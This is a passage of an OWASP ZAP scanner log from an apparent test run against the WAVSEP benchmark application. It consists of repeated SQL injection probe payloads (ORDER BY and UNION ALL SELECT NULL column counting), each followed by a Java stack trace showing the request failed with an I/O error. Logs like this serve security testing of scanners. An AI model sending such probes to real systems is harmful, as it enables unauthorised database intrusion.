org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 8963062 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%' ORDER BY 8640#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%' ORDER BY 8640# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 8963067 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8963068 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8963069 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8963070 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8963073 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8963075 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8963083 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8963084 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8963085 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8963086 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8963087 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 8963088 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp ORDER BY 5147#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp ORDER 